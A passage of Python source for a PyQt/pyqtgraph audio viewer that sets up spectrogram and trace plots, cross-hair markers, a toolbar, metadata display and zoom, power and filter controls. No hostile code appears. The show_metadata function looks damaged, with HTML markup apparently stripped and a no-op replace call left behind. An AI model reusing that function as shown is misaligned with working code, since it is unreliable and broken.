None:\n if len(self.channels) == 0:\n self.show_channels = list(range(self.data.channels))\n else:\n self.show_channels = [c for c in self.channels if c < self.data.channels]\n else:\n self.show_channels = [c for c in self.show_channels if c < self.data.channels]\n if len(self.show_channels) == 0:\n self.show_channels = [0]\n \n self.current_channel = self.show_channels[0]\n self.selected_channels = list(self.show_channels)\n\n # load data:\n fmt_md = dict(filepath=self.file_path,\n samplingrate=f'{self.rate:.1f}Hz',\n channels=self.data.channels,\n frames=self.data.frames,\n duration=f'{self.data.frames/self.rate:.3f}s')\n md, cues = self.data.metadata(store_empty=False, first_only=False)\n self.meta_data = dict(format=fmt_md)\n self.meta_data.update(md)\n for c in cues:\n self.marker_data.add_data(0, float(c['pos'])/self.rate, label=c.get('label', ''))\n labels = [c['label'] for c in cues if 'label' in c]\n for i, l in enumerate(labels):\n self.marker_labels.append(MarkerLabel(l, '', list(colors.keys())[i % len(colors.keys())]))\n self.data[0,:]\n\n self.figs = [] # all GraphicsLayoutWidgets - one for each channel\n self.borders = []\n self.sig_proxies = []\n # nested lists (channel, panel):\n self.axs = [] # all plots\n self.axts = [] # plots with time axis\n self.axys = [] # plots with amplitude axis\n self.axfxs = [] # plots with x-frequency axis\n self.axfys = [] # plots with y-frequency axis\n self.axgs = [] # plots with grids\n # lists with one plot per channel:\n self.axtraces = [] # trace plots\n self.axspacers = [] # spacer between trace and spectrogram\n self.axspecs = [] # spectrogram plots\n self.traces = [] # traces\n self.trace_labels = [] # labels on traces\n self.specs = [] # spectrograms\n self.spec_labels = [] # labels on spectrograms\n self.cbars = [] # color bars\n self.audio_markers = [] # vertical line showing position while playing\n # font size:\n xwidth = self.fontMetrics().averageCharWidth()\n xwidth2 = xwidth/2\n for c in range(self.data.channels):\n self.axs.append([])\n self.axts.append([])\n self.axys.append([])\n self.axfxs.append([])\n self.axfys.append([])\n self.axgs.append([])\n self.audio_markers.append([])\n \n # one figure per channel:\n fig = pg.GraphicsLayoutWidget()\n fig.setBackground(None)\n fig.ci.layout.setContentsMargins(xwidth2, xwidth2, xwidth2, xwidth2)\n fig.ci.layout.setVerticalSpacing(0)\n fig.ci.layout.setHorizontalSpacing(xwidth)\n fig.setVisible(c in self.show_channels)\n self.vbox.addWidget(fig)\n self.figs.append(fig)\n \n # border:\n border = QGraphicsRectItem()\n border.setZValue(-1000)\n border.setPen(pg.mkPen('#aaaaaa', width=xwidth+1))\n fig.scene().addItem(border)\n fig.sigDeviceRangeChanged.connect(self.update_borders)\n self.borders.append(border)\n \n # spectrogram:\n spec = SpecItem(self.data, self.rate, c, 256, 0.5)\n self.specs.append(spec)\n axs = SpectrumPlot(c, xwidth, spec.fmax)\n axs.addItem(spec)\n labels = []\n for l in self.marker_labels:\n label = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None),\n brush=pg.mkBrush(l.color))\n axs.addItem(label)\n labels.append(label)\n self.spec_labels.append(labels)\n axs.setLimits(xMax=self.tmax,\n minXRange=10/self.rate, maxXRange=self.tmax)\n axs.setXRange(self.toffset, self.toffset + self.twindow)\n axs.sigXRangeChanged.connect(self.update_times)\n axs.setYRange(self.specs[c].f0, self.specs[c].f1)\n axs.sigYRangeChanged.connect(self.update_frequencies)\n axs.sigSelectedRegion.connect(self.region_menu)\n axs.sigUpdateFilter.connect(self.update_filter)\n axs.getViewBox().init_zoom_history()\n self.audio_markers[-1].append(axs.vmarker)\n fig.addItem(axs, row=0, col=0)\n \n # color bar:\n cbar = pg.ColorBarItem(colorMap='CET-R4', interactive=True,\n rounding=1, limits=(-200, 20))\n cbar.setLabel('right', 'Power (dB)')\n cbar.getAxis('right').setTextPen('black')\n cbar.getAxis('right').setWidth(6*xwidth)\n cbar.setLevels([spec.zmin, spec.zmax])\n cbar.setImageItem(spec)\n cbar.sigLevelsChanged.connect(self.update_power)\n cbar.setVisible(self.show_cbars)\n self.cbars.append(cbar)\n fig.addItem(cbar, row=0, col=1)\n spec.setCBar(cbar)\n self.axts[-1].append(axs)\n self.axfys[-1].append(axs)\n self.axgs[-1].append(axs)\n self.axs[-1].append(axs)\n self.axspecs.append(axs)\n \n # spacer:\n axsp = fig.addLayout(row=1, col=0)\n axsp.setContentsMargins(0, 0, 0, 0)\n self.axspacers.append(axsp)\n \n # trace plot:\n trace = TraceItem(self.data, self.rate, c)\n self.traces.append(trace)\n axt = OscillogramPlot(c, xwidth)\n axt.addItem(trace)\n labels = []\n for l in self.marker_labels:\n label = pg.ScatterPlotItem(size=10, hoverSize=20,\n hoverable=True,\n pen=pg.mkPen(None),\n brush=pg.mkBrush(l.color))\n axt.addItem(label)\n labels.append(label)\n self.trace_labels.append(labels)\n axt.getAxis('bottom').showLabel(c == self.show_channels[-1])\n axt.getAxis('bottom').setStyle(showValues=(c == self.show_channels[-1]))\n axt.setLimits(xMin=0, xMax=self.tmax,\n minXRange=10/self.rate, maxXRange=self.tmax)\n if np.isfinite(self.data.ampl_min) and np.isfinite(self.data.ampl_max):\n axt.setLimits(yMin=self.data.ampl_min, yMax=self.data.ampl_max,\n minYRange=1/2**16,\n maxYRange=self.data.ampl_max - self.data.ampl_min)\n\n axt.setXRange(self.toffset, self.toffset + self.twindow)\n axt.sigXRangeChanged.connect(self.update_times)\n axt.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n axt.sigYRangeChanged.connect(self.update_amplitudes)\n axt.sigSelectedRegion.connect(self.region_menu)\n axt.getViewBox().init_zoom_history()\n self.audio_markers[-1].append(axt.vmarker)\n fig.addItem(axt, row=2, col=0)\n self.axts[-1].append(axt)\n self.axys[-1].append(axt)\n self.axgs[-1].append(axt)\n self.axs[-1].append(axt)\n self.axtraces.append(axt)\n\n proxy = pg.SignalProxy(fig.scene().sigMouseMoved, rateLimit=60,\n slot=lambda x, c=c: self.mouse_moved(x, c))\n self.sig_proxies.append(proxy)\n proxy = pg.SignalProxy(fig.scene().sigMouseClicked, rateLimit=60,\n slot=lambda x, c=c: self.mouse_clicked(x, c))\n self.sig_proxies.append(proxy)\n \n self.set_times()\n \n # tool bar:\n self.toolbar = QToolBar()\n self.toolbar.addAction(self.acts.skip_backward)\n self.toolbar.addAction(self.acts.seek_backward)\n self.toolbar.addAction(self.acts.seek_forward)\n self.toolbar.addAction(self.acts.skip_forward)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.acts.play_window)\n self.toolbar.addSeparator()\n self.toolbar.addAction(self.acts.zoom_home)\n self.toolbar.addAction(self.acts.zoom_back)\n self.toolbar.addAction(self.acts.zoom_forward)\n self.toolbar.addSeparator()\n self.nfftw = QComboBox(self)\n self.nfftw.setToolTip('NFFT (R, Shift+R)')\n self.nfftw.addItems([f'{2**i}' for i in range(4, 16)])\n self.nfftw.setEditable(False)\n self.nfftw.setCurrentText(f'{self.specs[self.current_channel].nfft}')\n self.nfftw.currentTextChanged.connect(lambda s: self.set_resolution(nfft=int(s)))\n self.toolbar.addWidget(self.nfftw)\n self.toolbar.addSeparator()\n self.toolbar.addWidget(QLabel('Channel:'))\n for act in self.acts.channels[:self.data.channels]:\n self.toolbar.addAction(act)\n spacer = QWidget()\n spacer.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)\n self.toolbar.addWidget(spacer)\n self.xpos_action = self.toolbar.addAction('xpos')\n self.xpos_action.setVisible(False)\n self.toolbar.widgetForAction(self.xpos_action).setFixedWidth(10*xwidth)\n self.ypos_action = self.toolbar.addAction('ypos')\n self.ypos_action.setVisible(False)\n self.toolbar.widgetForAction(self.ypos_action).setFixedWidth(10*xwidth)\n self.zpos_action = self.toolbar.addAction('zpos')\n self.zpos_action.setVisible(False)\n self.toolbar.widgetForAction(self.zpos_action).setFixedWidth(10*xwidth)\n self.vbox.addWidget(self.toolbar)\n \n # full data:\n self.datafig = FullTracePlot(self.data, self.rate, self.axtraces)\n self.vbox.addWidget(self.datafig)\n\n self.setEnabled(True)\n self.adjust_layout(self.width(), self.height())\n\n # add marker data to plot:\n labels = [l.label for l in self.marker_labels]\n for t, l in zip(self.marker_data.times, self.marker_data.labels):\n lidx = labels.index(l)\n for c, tl in enumerate(self.trace_labels):\n tidx = int(t*self.rate)\n tl[lidx].addPoints((t,), (self.data[tidx, c],), data=(l,))\n for c, sl in enumerate(self.spec_labels):\n sl[lidx].addPoints((t,), (0.0,), data=(l,))\n\n\n def show_metadata(self):\n \n def format_section(md, level):\n mdtable = ''\n if isinstance(md, dict):\n for k in md:\n if isinstance(md[k], dict):\n # new section:\n pads = ''\n if level > 0:\n pads = f' style=\"padding-left: {level*30:d}px;\"'\n mdtable += f'{k}:'\n mdtable += format_section(md[k], level+1)\n else:\n # key-value pair:\n pads = ''\n if level > 0:\n pads = f' style=\"padding-left: {level*30:d}px;\"'\n value = md[k]\n if isinstance(value, (list, tuple)):\n value = ', '.join(value)\n mdtable += f'{k}{value}'\n else:\n if hasattr(md, '__getitem__') and len(md) > 0 and md[0] == '<':\n dom = xml.dom.minidom.parseString(md)\n md = dom.toprettyxml(indent=' ')\n md = f'
{md.replace(\"<\", \"<\").replace(\">\", \">\")}
'\n mdtable += f'{md}'\n return mdtable\n\n w = xwidth = self.fontMetrics().averageCharWidth()\n level = 0\n mdtable = f''\n for i, sk in enumerate(self.meta_data):\n md = self.meta_data[sk]\n if i > 0:\n mdtable += ''\n mdtable += f''\n mdtable += format_section(md, level)\n mdtable += '
{sk}:
'\n dialog = QDialog(self)\n dialog.setWindowTitle('Meta data')\n vbox = QVBoxLayout()\n dialog.setLayout(vbox)\n label = QLabel(mdtable)\n label.setTextInteractionFlags(Qt.TextSelectableByMouse);\n scrollarea = QScrollArea()\n scrollarea.setWidget(label)\n vbox.addWidget(scrollarea)\n buttons = QDialogButtonBox(QDialogButtonBox.Close)\n buttons.rejected.connect(dialog.reject)\n vbox.addWidget(buttons)\n dialog.show()\n\n\n def set_cross_hair(self, checked):\n self.cross_hair = checked\n if self.cross_hair:\n # disable existing key shortcuts:\n self.marker_orig_acts = []\n for l in self.marker_labels:\n ks = QKeySequence(l.key_shortcut)\n for a in dir(self.acts):\n act = getattr(self.acts, a)\n if isinstance(act, QAction) and act.shortcut() == ks:\n self.marker_orig_acts.append((act.shortcut(), act))\n act.setShortcut(QKeySequence())\n break\n # setup marker actions: \n for l in self.marker_labels:\n if l.action is None:\n l.action = QAction(l.label, self)\n l.action.triggered.connect(lambda x, label=l.label: self.store_marker(label))\n self.addAction(l.action)\n l.action.setShortcut(l.key_shortcut)\n l.action.setEnabled(True)\n else:\n self.xpos_action.setVisible(False)\n self.ypos_action.setVisible(False)\n self.zpos_action.setVisible(False)\n for axts in self.axts:\n for ax in axts:\n ax.xline.setPos(-1)\n for axys in self.axys:\n for ax in axys:\n ax.yline.setPos(-1000)\n for axfys in self.axfys:\n for ax in axfys:\n ax.yline.setPos(-1)\n self.clear_marker()\n # disable marker actions:\n for l in self.marker_labels:\n l.action.setEnabled(False)\n # restore key shortcuts:\n for key, act in self.marker_orig_acts:\n act.setShortcuts(key)\n self.marker_orig_acts = []\n\n\n def clear_marker(self):\n for axs in self.axs:\n for axp in axs:\n if hasattr(axp, 'prev_marker'):\n axp.prev_marker.clear()\n self.prev_channel = None\n\n\n def set_marker(self):\n self.clear_marker()\n if not self.marker_ax is None and not self.marker_time is None:\n if not self.marker_ampl is None:\n self.marker_ax.prev_marker.setData((self.marker_time,),\n (self.marker_ampl,))\n if not self.marker_freq is None:\n self.marker_ax.prev_marker.setData((self.marker_time,),\n (self.marker_freq,))\n # remember:\n self.prev_time = self.marker_time\n self.prev_ampl = self.marker_ampl\n self.prev_freq = self.marker_freq\n self.prev_power = self.marker_power\n self.prev_channel = self.marker_channel\n\n \n def store_marker(self, label=''):\n self.marker_model.add_data(self.marker_channel,\n self.marker_time, self.marker_ampl,\n self.marker_freq,\n self.marker_power,self.delta_time,\n self.delta_ampl, self.delta_freq,\n self.delta_power, label)\n # add new label point to scatter plots:\n labels = [l.label for l in self.marker_labels]\n if len(label) > 0 and label in labels and \\\n not self.marker_time is None:\n lidx = labels.index(label)\n for c, tl in enumerate(self.trace_labels):\n if c == self.marker_channel and not self.marker_ampl is None:\n tl[lidx].addPoints((self.marker_time,),\n (self.marker_ampl,))\n else:\n tidx = int(self.marker_time*self.rate)\n tl[lidx].addPoints((self.marker_time,),\n (self.data[tidx, c],))\n for c, sl in enumerate(self.spec_labels):\n y = 0.0 if self.marker_freq is None else self.marker_freq\n sl[lidx].addPoints((self.marker_time,), (y,))\n \n \n def mouse_moved(self, evt, channel):\n if not self.cross_hair:\n return\n \n # find axes and position:\n pixel_pos = evt[0]\n self.marker_ax = None\n self.marker_time = None\n self.marker_ampl = None\n self.marker_freq = None\n self.marker_power = None\n self.marker_channel = channel\n for ax in self.axs[channel]:\n if ax.sceneBoundingRect().contains(pixel_pos):\n pos = ax.getViewBox().mapSceneToView(pixel_pos)\n pixel_pos.setX(pixel_pos.x()+1)\n npos = ax.getViewBox().mapSceneToView(pixel_pos)\n if hasattr(ax, 'xline'):\n ax.xline.setPos(pos.x())\n # is it time?\n for axts in self.axts:\n if ax in axts:\n self.marker_ax = ax\n self.marker_time = pos.x()\n break\n if hasattr(ax, 'yline'):\n ax.yline.setPos(pos.y())\n # is it amplitude?\n for axys in self.axys:\n if ax in axys:\n self.marker_ampl = pos.y()\n break\n # is it trace amplitude?\n if ax in self.axtraces:\n if not self.marker_time is None:\n trace = self.traces[self.axtraces.index(ax)]\n self.marker_time, self.marker_ampl = \\\n trace.get_amplitude(self.marker_time,\n pos.y(), npos.x())\n # is it frequency?\n for axfys in self.axfys:\n if ax in axfys:\n self.marker_freq = pos.y()\n break\n # is it spectrogram?\n if self.marker_time is not None and \\\n self.marker_freq is not None and ax in self.axspecs:\n spec = self.specs[self.axspecs.index(ax)]\n fi = int(floor(self.marker_freq/spec.fresolution))\n ti = int(floor((self.marker_time - spec.offset/spec.rate) / spec.tresolution))\n self.marker_power = spec.spectrum[fi, ti]\n break\n \n # set cross-hair positions:\n for axts in self.axts:\n for axt in axts:\n axt.xline.setPos(-1 if self.marker_time is None else self.marker_time)\n for axys in self.axys:\n for axy in axys:\n axy.yline.setPos(-1000 if self.marker_ampl is None else self.marker_ampl)\n for axfys in self.axfys:\n for axf in axfys:\n axf.yline.setPos(-1 if self.marker_freq is None else self.marker_freq)\n \n # compute deltas:\n self.delta_time = None\n self.delta_ampl = None\n self.delta_freq = None\n self.delta_power = None\n if self.marker_time is not None and \\\n self.prev_channel is not None and self.prev_time is not None:\n self.delta_time = self.marker_time - self.prev_time\n if self.marker_ampl is not None and \\\n self.prev_channel is not None and self.prev_ampl is not None:\n self.delta_ampl = self.marker_ampl - self.prev_ampl\n if self.marker_freq is not None and \\\n self.prev_channel is not None and self.prev_freq is not None:\n self.delta_freq = self.marker_freq - self.prev_freq\n if self.marker_power is not None and \\\n self.prev_channel is not None and self.prev_power is not None:\n self.delta_power = self.marker_power - self.prev_power\n \n # report time on toolbar:\n if self.delta_time is not None:\n sign = '-' if self.delta_time < 0 else ''\n s = f'\\u0394t={sign}{secs_to_str(fabs(self.delta_time))}'\n self.xpos_action.setText(s)\n elif self.marker_time is not None:\n sign = '-' if self.marker_time < 0 else ''\n s = f't={sign}{secs_to_str(fabs(self.marker_time))}'\n self.xpos_action.setText(s)\n else:\n self.xpos_action.setText('')\n # report amplitude or frequency on toolbar:\n if self.delta_ampl is not None:\n s = f'\\u0394a={self.delta_ampl:6.3f}'\n self.ypos_action.setText(s)\n elif self.marker_ampl is not None:\n s = f'a={self.marker_ampl:6.3f}'\n self.ypos_action.setText(s)\n elif self.delta_freq is not None:\n s = f'\\u0394f={self.delta_freq:4.0f}Hz'\n self.ypos_action.setText(s)\n elif self.marker_freq is not None:\n s = f'f={self.marker_freq:4.0f}Hz'\n self.ypos_action.setText(s)\n else:\n self.ypos_action.setText('')\n # report power on toolbar:\n if self.delta_power is not None:\n s = f'\\u0394p={self.delta_power:6.1f}dB'\n self.zpos_action.setText(s)\n elif self.marker_power is not None:\n s = f'p={self.marker_power:6.1f}dB'\n self.zpos_action.setText(s)\n else:\n self.zpos_action.setText('')\n self.xpos_action.setVisible(self.marker_time is not None)\n self.ypos_action.setVisible(self.marker_ampl is not None or\n self.marker_freq is not None)\n self.zpos_action.setVisible(self.marker_power is not None)\n\n\n def mouse_clicked(self, evt, channel):\n if not self.cross_hair:\n return\n \n # update position:\n self.mouse_moved((evt[0].scenePos(),), channel)\n\n # store marker positions:\n if (evt[0].button() & Qt.LeftButton) > 0 and \\\n (evt[0].modifiers() == Qt.NoModifier or \\\n (evt[0].modifiers() & Qt.ShiftModifier) == Qt.ShiftModifier):\n menu = QMenu(self)\n acts = [menu.addAction(self.marker_labels_model.icons[l.color], l.label) for l in self.marker_labels]\n act = menu.exec(QCursor.pos())\n if act in acts:\n idx = acts.index(act)\n self.store_marker(self.marker_labels[idx].label)\n\n # clear marker:\n if (evt[0].button() & Qt.RightButton) > 0:\n self.clear_marker()\n \n # set marker and remember position:\n if (evt[0].button() & Qt.LeftButton) > 0 and \\\n (evt[0].modifiers() & Qt.ControlModifier) == Qt.ControlModifier:\n self.set_marker()\n\n \n def label_editor(self):\n self.marker_labels_model.set(self.marker_labels)\n self.marker_labels_model.edit(self)\n \n \n def marker_table(self):\n dialog = QDialog(self)\n dialog.setWindowTitle('Audian marker table')\n vbox = QVBoxLayout()\n dialog.setLayout(vbox)\n view = QTableView()\n view.setModel(self.marker_model)\n view.resizeColumnsToContents()\n width = view.verticalHeader().width() + 24\n for c in range(self.marker_model.columnCount()):\n width += view.columnWidth(c)\n dialog.setMaximumWidth(width)\n dialog.resize(width, 2*width//3)\n view.setSelectionMode(QAbstractItemView.ContiguousSelection)\n vbox.addWidget(view)\n buttons = QDialogButtonBox(QDialogButtonBox.Close |\n QDialogButtonBox.Save |\n QDialogButtonBox.Reset)\n buttons.rejected.connect(dialog.reject)\n buttons.button(QDialogButtonBox.Reset).clicked.connect(self.marker_model.clear)\n buttons.button(QDialogButtonBox.Save).clicked.connect(lambda x: self.marker_model.save(self))\n vbox.addWidget(buttons)\n dialog.show()\n \n\n def update_borders(self, rect=None):\n for c in range(len(self.figs)):\n self.borders[c].setRect(0, 0, self.figs[c].size().width(),\n self.figs[c].size().height())\n self.borders[c].setVisible(c in self.selected_channels)\n\n\n def showEvent(self, event):\n if self.data is None:\n return\n self.setting = True\n for c in range(self.data.channels):\n # update time ranges:\n for ax in self.axts[c]:\n ax.setXRange(self.toffset, self.toffset + self.twindow)\n # update amplitude ranges:\n for ax in self.axys[c]:\n ax.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n # update frequency ranges:\n for ax in self.axfys[c]:\n ax.setYRange(self.specs[c].f0, self.specs[c].f1)\n for ax in self.axfxs[c]:\n ax.setXRange(self.specs[c].f0, self.specs[c].f1)\n # update spectrograms:\n self.specs[c].update_spectrum()\n self.setting = False\n\n \n def resizeEvent(self, event):\n if self.show_channels is None or len(self.show_channels) == 0:\n return\n self.adjust_layout(event.size().width(), event.size().height())\n \n\n def adjust_layout(self, width, height):\n xwidth = self.fontMetrics().averageCharWidth()\n xheight = self.fontMetrics().ascent()\n # subtract full data plot:\n data_height = 5*xheight//2 if len(self.show_channels) <= 1 else 3*xheight//2\n if not self.show_fulldata:\n data_height = 0\n height -= len(self.show_channels)*data_height\n # subtract toolbar:\n height -= 2*xheight\n bottom_channel = self.show_channels[-1]\n trace_frac = self.trace_fracs[self.show_specs]\n #axis_height = None\n #if self.axtraces[bottom_channel].isVisible():\n # axis_height = self.axtraces[bottom_channel].getAxis('bottom').height()\n #elif self.axspecs[bottom_channel].isVisible():\n # axis_height = self.axspecs[bottom_channel].getAxis('bottom').height()\n axis_height = 3.2*xheight\n ntraces = []\n nspecs = []\n nspacer = 0\n for c in self.show_channels:\n if c >= len(self.axspecs) or c >= len(self.axtraces):\n break\n nspecs.append(int(self.axspecs[c].isVisible()))\n ntraces.append(int(self.axtraces[c].isVisible()))\n if self.axspecs[c].isVisible() and self.axtraces[c].isVisible():\n nspacer += 1\n spec_height = (height - len(self.show_channels)*xwidth - nspacer*xwidth - axis_height)/(np.sum(nspecs) + trace_frac*np.sum(ntraces))\n for c, ns, nt in zip(self.show_channels, nspecs, ntraces):\n add_height = axis_height if c == bottom_channel else 0\n self.vbox.setStretch(c, int(ns*spec_height + (nt+ns)*xwidth +\n nt*trace_frac*spec_height + add_height))\n t_height = max(0, int(nt*(trace_frac*spec_height + add_height)))\n self.figs[c].ci.layout.setRowFixedHeight(2, t_height)\n self.figs[c].ci.layout.setRowFixedHeight(1, (nt+ns-1)*xwidth)\n s_height = max(0, int(ns*spec_height + (1-nt)*add_height))\n self.figs[c].ci.layout.setRowFixedHeight(0, s_height)\n # fix full data plot:\n self.datafig.update_layout(self.show_channels, data_height)\n self.datafig.setVisible(self.show_fulldata)\n # update:\n for c in self.show_channels:\n self.figs[c].update()\n \n \n def show_xticks(self, channel, show_ticks):\n if self.axtraces[channel].isVisible():\n self.axtraces[channel].getAxis('bottom').showLabel(show_ticks)\n self.axtraces[channel].getAxis('bottom').setStyle(showValues=show_ticks)\n self.axspecs[channel].getAxis('bottom').showLabel(False)\n self.axspecs[channel].getAxis('bottom').setStyle(showValues=False)\n elif self.axspecs[channel].isVisible():\n self.axspecs[channel].getAxis('bottom').showLabel(show_ticks)\n self.axspecs[channel].getAxis('bottom').setStyle(showValues=show_ticks)\n\n\n def set_times(self, toffset=None, twindow=None, dispatch=True):\n self.setting = True\n if not toffset is None:\n self.toffset = toffset\n if not twindow is None:\n self.twindow = twindow\n n2 = ceil(self.tmax / (0.5*self.twindow))\n ttmax = max(self.twindow, n2*0.5*self.twindow)\n for axs in self.axts:\n for ax in axs:\n ax.setLimits(xMax=ttmax, maxXRange=ttmax)\n if self.isVisible():\n ax.setXRange(self.toffset, self.toffset + self.twindow)\n self.setting = False\n if dispatch:\n self.sigTimesChanged.emit(self.toffset, self.twindow)\n\n \n def update_times(self, viewbox, trange):\n if self.setting:\n return\n self.toffset = trange[0]\n self.twindow = trange[1] - trange[0]\n self.set_times()\n \n \n def zoom_time_in(self):\n if self.twindow * self.rate >= 20:\n self.twindow *= 0.5\n self.set_times()\n \n \n def zoom_time_out(self):\n if self.toffset + self.twindow < self.tmax:\n self.twindow *= 2.0\n self.set_times()\n\n \n def time_seek_forward(self):\n if self.toffset + self.twindow < self.tmax:\n self.toffset += 0.5*self.twindow\n self.set_times()\n\n \n def time_seek_backward(self):\n if self.toffset > 0:\n self.toffset -= 0.5*self.twindow\n if self.toffset < 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_forward(self):\n if self.toffset + self.twindow < self.tmax:\n self.toffset += 0.05*self.twindow\n self.set_times()\n\n \n def time_backward(self):\n if self.toffset > 0.0:\n self.toffset -= 0.05*self.twindow\n if self.toffset < 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_home(self):\n if self.toffset > 0.0:\n self.toffset = 0.0\n self.set_times()\n\n \n def time_end(self):\n n2 = np.floor(self.tmax / (0.5*self.twindow))\n toffs = max(0, n2-1) * 0.5*self.twindow\n if self.toffset < toffs:\n self.toffset = toffs\n self.set_times()\n\n \n def snap_time(self):\n twindow = 10.0 * 2**np.round(log(self.twindow/10.0)/log(2.0))\n toffset = np.round(self.toffset / (0.5*twindow)) * (0.5*twindow)\n if twindow != self.twindow or toffset != self.toffset:\n self.set_times(toffset, twindow)\n\n\n def set_amplitudes(self, ymin=None, ymax=None):\n self.setting = True\n for c in self.selected_channels:\n if not ymin is None:\n self.traces[c].ymin = ymin\n if not ymax is None:\n self.traces[c].ymax = ymax\n if self.isVisible():\n for ax in self.axys[c]:\n ax.setYRange(self.traces[c].ymin, self.traces[c].ymax)\n self.setting = False\n\n \n def update_amplitudes(self, viewbox, arange):\n if self.setting:\n return\n self.set_amplitudes(arange[0], arange[1])\n self.sigAmplitudesChanged.emit(arange[0], arange[1])\n \n\n def zoom_ampl_in(self):\n for c in self.selected_channels:\n self.traces[c].zoom_ampl_in()\n self.set_amplitudes()\n\n \n def zoom_ampl_out(self):\n for c in self.selected_channels:\n self.traces[c].zoom_ampl_out()\n self.set_amplitudes()\n \n \n def auto_ampl(self):\n for c in self.selected_channels:\n self.traces[c].auto_ampl(self.toffset, self.twindow)\n self.set_amplitudes()\n\n \n def reset_ampl(self):\n for c in self.selected_channels:\n self.traces[c].reset_ampl()\n self.set_amplitudes()\n\n\n def center_ampl(self):\n for c in self.selected_channels:\n self.traces[c].center_ampl()\n self.set_amplitudes()\n\n\n def set_frequencies(self, f0=None, f1=None):\n self.setting = True\n for c in self.selected_channels:\n if not f0 is None:\n self.specs[c].f0 = f0\n if not f1 is None:\n self.specs[c].f1 = f1\n if self.isVisible():\n for ax in self.axfys[c]:\n ax.setYRange(self.specs[c].f0, self.specs[c].f1)\n for ax in self.axfxs[c]:\n ax.setXRange(self.specs[c].f0, self.specs[c].f1)\n self.setting = False\n\n \n def update_frequencies(self, viewbox, frange):\n if self.setting:\n return\n self.set_frequencies(frange[0], frange[1])\n self.sigFrequenciesChanged.emit(frange[0], frange[1])\n \n \n def zoom_freq_in(self):\n for c in self.selected_channels:\n self.specs[c].zoom_freq_in()\n self.set_frequencies()\n \n \n def zoom_freq_out(self):\n for c in self.selected_channels:\n self.specs[c].zoom_freq_out()\n self.set_frequencies()\n \n \n def freq_down(self):\n for c in self.selected_channels:\n self.specs[c].freq_down()\n self.set_frequencies()\n\n \n def freq_up(self):\n for c in self.selected_channels:\n self.specs[c].freq_up()\n self.set_frequencies()\n\n\n def freq_home(self):\n for c in self.selected_channels:\n self.specs[c].freq_home()\n self.set_frequencies()\n\n \n def freq_end(self):\n for c in self.selected_channels:\n self.specs[c].freq_end()\n self.set_frequencies()\n\n\n def set_resolution(self, nfft=None, step_frac=None, dispatch=True):\n self.setting = True\n if not isinstance(nfft, list):\n nfft = [nfft] * (np.max(self.selected_channels) + 1)\n if not isinstance(step_frac, list):\n step_frac = [step_frac] * (np.max(self.selected_channels) + 1)\n for c in self.selected_channels:\n self.specs[c].set_resolution(nfft[c], step_frac[c],\n self.isVisible())\n self.nfftw.setCurrentText(f'{self.specs[self.current_channel].nfft}')\n self.setting = False\n if dispatch:\n self.sigResolutionChanged.emit()\n\n \n def freq_resolution_down(self):\n for c in self.selected_channels:\n self.specs[c].freq_resolution_down()\n self.set_resolution()\n\n \n def freq_resolution_up(self):\n for c in self.selected_channels:\n self.specs[c].freq_resolution_up()\n self.set_resolution()\n\n\n def step_frac_down(self):\n for c in self.selected_channels:\n self.specs[c].step_frac_down()\n self.set_resolution()\n\n\n def step_frac_up(self):\n for c in self.selected_channels:\n self.specs[c].step_frac_up()\n self.set_resolution()\n\n\n def set_power(self, zmin=None, zmax=None, dispatch=True):\n self.setting = True\n if not isinstance(zmin, list):\n zmin = [zmin] * (np.max(self.selected_channels) + 1)\n if not isinstance(zmax, list):\n zmax = [zmax] * (np.max(self.selected_channels) + 1)\n for c in self.selected_channels:\n self.specs[c].set_power(zmin[c], zmax[c])\n self.setting = False\n if dispatch:\n self.sigPowerChanged.emit()\n\n\n def update_power(self, cbar):\n if self.setting:\n return\n self.set_power(cbar.levels()[0], cbar.levels()[1])\n\n\n def power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmax += 5.0\n self.specs[c].zmin += 5.0\n self.set_power()\n\n\n def power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmax -= 5.0\n self.specs[c].zmin -= 5.0\n self.set_power()\n\n\n def max_power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmax += 5.0\n self.set_power()\n\n\n def max_power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmax -= 5.0\n self.set_power()\n\n\n def min_power_up(self):\n for c in self.selected_channels:\n self.specs[c].zmin += 5.0\n self.set_power()\n\n\n def min_power_down(self):\n for c in self.selected_channels:\n self.specs[c].zmin -= 5.0\n self.set_power()\n\n\n def highpass_cutoff_up(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if highpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(highpass_cutoff)))\n elif highpass_cutoff == 0.0:\n step = 100.0\n highpass_cutoff += step\n if highpass_cutoff + step > lowpass_cutoff:\n highpass_cutoff = lowpass_cutoff - step\n if highpass_cutoff < 0:\n highpass_cutoff = 0\n self.update_filter(self.current_channel, highpass_cutoff,\n None, True)\n\n\n def highpass_cutoff_down(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n step = 1.0\n if highpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(highpass_cutoff)))\n step = 0.5*10**(floor(log10(highpass_cutoff - 0.1*step)))\n highpass_cutoff -= step\n if highpass_cutoff < 0:\n highpass_cutoff = 0\n self.update_filter(self.current_channel, highpass_cutoff,\n None, True)\n\n\n def lowpass_cutoff_up(self):\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if lowpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(lowpass_cutoff)))\n lowpass_cutoff += step\n if lowpass_cutoff > self.rate/2:\n lowpass_cutoff = self.rate/2\n self.update_filter(self.current_channel, None,\n lowpass_cutoff, True)\n\n\n def lowpass_cutoff_down(self):\n highpass_cutoff = self.traces[self.current_channel].highpass_cutoff\n lowpass_cutoff = self.traces[self.current_channel].lowpass_cutoff\n step = 1.0\n if lowpass_cutoff >= 1.0:\n step = 0.5*10**(floor(log10(lowpass_cutoff)))\n step = 0.5*10**(floor(log10(lowpass_cutoff - 0.1*step)))\n if lowpass_cutoff < highpass_cutoff + step:\n return\n lowpass_cutoff -= step\n if lowpass_cutoff < highpass_cutoff + 